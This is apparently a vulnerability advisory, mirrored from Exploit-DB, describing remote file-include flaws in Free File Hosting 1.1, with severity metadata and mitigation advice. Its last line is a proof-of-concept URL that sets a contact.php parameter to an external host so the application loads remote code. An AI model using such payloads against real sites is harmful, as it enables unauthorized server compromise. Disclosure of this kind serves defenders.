Remote File-Include Vulnerabilities in Free File Hosting

vendor:

Free File Hosting

by:

7.5

CVSS

HIGH

Remote File-Include

CWE

Product Name: Free File Hosting

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE:

CPE: a:free_file_hosting_project:free_file_hosting:1.1

Metasploit:

Other Scripts:

Platforms Tested:

Remote File-Include Vulnerabilities in Free File Hosting

Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Implement proper input validation and sanitization techniques to prevent remote file-include vulnerabilities. Regularly update and patch the Free File Hosting software.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23118/info

Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.1 is vulnerable to these issues.

This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.

This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com